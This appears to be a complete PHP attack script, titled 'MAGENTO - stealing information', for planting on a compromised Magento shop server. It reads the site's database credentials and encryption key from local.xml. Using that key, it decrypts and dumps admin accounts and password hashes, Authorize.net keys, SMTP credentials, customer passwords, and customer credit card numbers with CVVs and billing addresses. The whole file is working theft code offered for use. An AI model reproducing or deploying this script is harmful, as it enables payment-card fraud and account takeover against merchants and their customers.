Magentot Stealth Info

1. <?php
2. /*
3. coder : sohai
4. */
5.  
6. @set_time_limit(0);
7.  
8. echo'<head>
9. <title>MAGENTO - stealing information</title>
10. </head>
11. <div id="page-wrap">
12. <body>
13. <style type="text/css">
14. body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#333333; }
15. table { width:100%; border-color:#333333;border-width:0pt 1pt; border-style:solid; }
16. td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
17. A:Link, A:Visited { color: #999999; text-decoration: none; }
18. A.no:Link, A.no:Visited { text-decoration: none; }
19. A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }
20. input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }
21. textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }
22. .fleft { float:left;text-align:left; }
23. .fright { float:right;text-align:right; }
24. #pagebar { font:8pt tahoma;padding:5px; border:3px solid #333333; border-collapse:collapse; }
25. #pagebar td { vertical-align:top; }
26. #pagebar p { font:8pt tahoma;}
27. #pagebar a { font-weight:bold;color:#666666; }
28. #pagebar a:visited { color:#00CE00; }
29. #mainmenu { text-align:center; }
30. #mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
31. #maininfo,.barheader,.barheader2 { text-align:center; }
32. #maininfo td { padding:3px; }
33. .barheader { font-weight:bold;padding:5px; }
34. .barheader2 { padding:5px;border:2px solid #333333; }
35. .contents,.explorer { border-collapse:collapse;}
36. .contents td { vertical-align:top; }
37. .mainpanel { border-collapse:collapse;padding:5px; }
38. .barheader,.mainpanel table,td { border:1px solid #333333; }
39. .mainpanel input,select,option { border:1px solid #333333;margin:0; }
40. input[type="submit"] { border:1px solid #333333; }
41. input[type="text"] { padding:3px;}
42. .fxerrmsg { color:red; font-weight:bold; }
43. #pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
44. #pagebar,.mainpanel,input[type="submit"] { background-color:black; }
45. .barheader2,input,select,option,input[type="submit"]:hover { background-color:black; }
46. textarea,.mainpanel input,select,option { background-color:#000000; }
47. // -->
48. </style>
49.  
50. <body bgcolor="#ffffff" >
51.  
52. <center>
53. <br>
54. <FORM action="" method="post">
55. <div align="center">[M A G E N T O] - Stealing Information<br>
56. <div align="center">coder: sohai & n4KuLa_<br>
57. <input type="hidden" name="form_action" value="2">
58. </div>
59. </div>
60. ';
61.  
62.  
63. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
64. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
65. if(isset($xml->global->resources->default_setup->connection)) {
66. $connection = $xml->global->resources->default_setup->connection;
67. $prefix = $xml->global->resources->db->table_prefix;
68. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
69. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
70.  
71. try {
72. $app = Mage::app('default');
73. Mage::getSingleton('core/session', array('name'=>'frontend'));
74. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
75.  
76. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
77. print("Could not connect: " . mysql_error());
78. }
79. mysql_select_db($connection->dbname);
80. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
81.  
82. $crypto = new Varien_Crypt_Mcrypt();
83. $crypto->init($key);
84.  
85. //=========================================================================================================
86. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
87. if (!$query){
88. echo "<center><b>Gagal</b></center>";
89. }else{
90. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
91. echo'<br><br>
92. ====================================================================<br>
93. [ Admin FROM website : '.$site['website'].'] <br>
94. ====================================================================<br>';
95. }
96. echo "
97. <table border='1' align='center' >
98. <tr>
99. <td>id</td>
100. <td>firstname</td>
101. <td>lastname</td>
102. <td>email</td>
103. <td>username</td>
104. <td>password</td>
105. </tr>";
106. while($vx = mysql_fetch_array($query)) {
107. $no = 1;
108. $user_id = $vx['user_id'];
109. $username = $vx['username'];
110. $password = $vx['password'];
111. $email = $vx['email'];
112. $firstname = $vx['firstname'];
113. $lastname = $vx['lastname'];
114. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
115. }
116. echo "</table><br>";
117. //=========================================================================================================
118. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
119. if(mysql_num_rows($query) != 0){
120. if (!$query){
121. echo "<center><b>Gagal</b></center>";
122. }else{
123. echo'<br><br>
124. ====================================================================<br>
125. [ Authorizenet ] <br>
126. ====================================================================<br>';
127. }
128. echo "
129. <table border='1' align='center' >
130. <tr>
131. <td>no</td>
132. <td>user</td>
133. <td>pass</td>
134. </tr>";
135. $no = 1;
136. while($vx = mysql_fetch_array($query)) {
137. $user = $crypto->decrypt($vx['user']);
138. $pass = $crypto->decrypt($vx['pass']);
139.  
140.  
141. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
142. $no++;
143. }
144. echo "</table><br>";
145. }
146. //=========================================================================================================
147. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
148. if(mysql_num_rows($query_smtp) != 0){
149. if (!$query_smtp){
150. echo "<center><b>Gagal</b></center>";
151. }else{
152. echo'<br><br>
153. ====================================================================<br>
154. [ SMTP ] <br>
155. ====================================================================<br>';
156. }
157. echo "
158. <table border='1' align='center' >
159. <tr>
160. <td>no</td>
161. <td>host</td>
162. <td>port</td>
163. <td>user</td>
164. <td>pass</td>
165. </tr>";
166. $no = 1;
167. $batas = 0;
168. while($rows = mysql_fetch_array($query_smtp)) {
169. $smtphost = $rows[0];
170. $smtpport = $rows[1];
171. $smtpuser = $rows[2];
172. $smtppass = $rows[3];
173. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
174. $no++;
175. }
176. echo "</table><br>";
177. }
178. //=========================================================================================================
179. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
180. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
181. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
182. echo'<br><br>
183. ====================================================================<br>
184. [ Credit Card ] <br>
185. ====================================================================<br>';
186. echo "
187. <table border='1' align='left' >
188. <tr>
189. <td>no</td>
190. <td>Date</td>
191. <td>Credit Owner</td>
192. <td>method</td>
193. <td>Credit Number</td>
194. <td>Credit Exp</td>
195. <td>CVV</td>
196. <td>Address</td>
197. </tr>";
198. $no = 1;
199. $batas = 0;
200. while($vx = mysql_fetch_array($query)){
201. $date = $vx['updated_at'];
202. $cc_owner = $vx['cc_owner'];
203. $method = $vx['method'];
204. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
205. $exp = $vx['exp'];
206. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
207. $Billing_Address = $vx['Billing Address'];
208. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
209. $batas = $no++;
210. }
211.  
212. while($vx2 = mysql_fetch_array($query2)){
213. $batas +=1;
214. $cc_owner = $vx2['cc_owner'];
215. $method = $vx2['method'];
216. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
217. $exp = $vx2['exp'];
218. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
219. $Billing_Address = $vx2['Billing Address'];
220. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
221. $batas++;
222. }
223.  
224. echo "</table><br>";
225. }
226. //=========================================================================================================
227. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
228. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
229.  
230.  
231. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
232. if (!$query){
233. echo "<center><b>Gagal</b></center>";
234. }else{
235. echo'<br><br>
236. ====================================================================<br>
237. [ Customer ] <br>
238. ====================================================================<br>';
239. }
240. echo "
241. <table border='1' align='center' >
242. <tr>
243. <td>no</td>
244. <td>user</td>
245. <td>pass</td>
246. </tr>";
247. $no = 1;
248. $batas = 0;
249. while($vx = mysql_fetch_array($query)) {
250. $user = $vx['email'];
251. $pass = $vx['value'];
252. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
253. $batas = $no++;
254. }
255.  
256. if(mysql_num_rows($query2) != 0 && ($query2)){
257. while($vx2 = mysql_fetch_array($query2)){
258. $user = $vx2['customer_email'];
259. $pass = $crypto->decrypt($vx2['password_hash']);
260. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
261. $batas +=1;
262. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
263. $batas++;
264. }
265. }
266. }
267.  
268. echo "</table><br>";
269. }
270. //=========================================================================================================
271. }
272. }
273. function save($format,$data){
274. $fp = fopen($format, 'a');
275. fwrite($fp, $data);
276. fclose($fp);
277. }
278. function cekbase64($string){
279. $decoded = base64_decode($string, true);
280. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
281. if(!base64_decode($string, true)) return false;
282. if(base64_encode($decoded) != $string) return false;
283. return true;//nilai return 1 jika true
284. }
285. //----untuk decode password ---/
286. class Varien_Crypt_Mcrypt{
287. /**
288. * Constuctor
289. *
290. * @param array $data
291. */
292. public function __construct()
293. {
294. }
295.  
296. /**
297. * Initialize mcrypt module
298. *
299. * @param string $key cipher private key
300. * @return Varien_Crypt_Mcrypt
301. */
302. public function init($key)
303. {
304. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
305. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
306. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
307.  
308. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
309. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
310. return null;
311. }
312.  
313. mcrypt_generic_init($this->handler, $key, $iv);
314.  
315. return $this;
316. }
317.  
318. /**
319. * Encrypt data
320. *
321. * @param string $data source string
322. * @return string
323. */
324. public function encrypt($data)
325. {
326. if (!$this->handler) {
327. //throw new Varien_Exception('Crypt module is not initialized.');
328. return null;
329. }
330. if (strlen($data) == 0) {
331. return $data;
332. }
333. return base64_encode(mcrypt_generic($this->handler, $data));
334. }
335.  
336. /**
337. * Decrypt data
338. *
339. * @param string $data encrypted string
340. * @return string
341. */
342. public function decrypt($data)
343. {
344. if (!$this->handler) {
345. //throw new Varien_Exception('Crypt module is not initialized.');
346. return null;
347. }
348. if (strlen($data) == 0) {
349. return $data;
350. }
351. return mdecrypt_generic($this->handler, base64_decode($data));
352. }
353.  
354.  
355. /**
356. * Desctruct cipher module
357. *
358. */
359. public function __destruct()
360. {
361. if ($this->handler) {
362. $this->_reset();
363. }
364. }
365.  
366. protected function _reset()
367. {
368. mcrypt_generic_deinit($this->handler);
369. mcrypt_module_close($this->handler);
370. }
371. }
372.  
373. ?>